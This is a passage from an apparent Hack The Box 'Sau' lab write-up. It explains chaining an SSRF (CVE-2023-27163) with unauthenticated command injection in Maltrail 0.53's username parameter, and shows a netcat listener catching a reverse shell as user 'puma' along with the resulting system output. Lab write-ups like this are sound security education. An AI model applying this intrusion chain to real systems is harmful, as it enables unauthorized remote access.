Unauthenticated OS Command Injection
As identified previously, the target system is running an outdated version of maltrail instance, 0.53, which turned out to be vulnerable to Unauthenticated OS command Injection
it seems pretty straight forward
The injection is done through the username parameter along side those special characters`;“
This is the POST data with payload
Since I am exploiting an internal web service via SSRF, I cannot just send this in. I’d have to find a way to deliver it
I can change the request method to GET via Burp Suite to get the complete payload
This works as they both achieve the same thing
Like so.
Then I can update the proxy configuration with the complete payload
Accessing the /ssrf endpoint
┌──(kali㉿kali)-[~/archive/htb/labs/sau]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.11.224] 35882
whoami
puma
hostname
sau
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.224 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:cef1 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:cef1 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:ce:f1 txqueuelen 1000 (Ethernet)
RX packets 8992892 bytes 884337958 (884.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11268096 bytes 20908198778 (20.9 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 77 bytes 13915 (13.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 77 bytes 13915 (13.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established as the puma user via RCE through SSRF (CVE-2023-27163)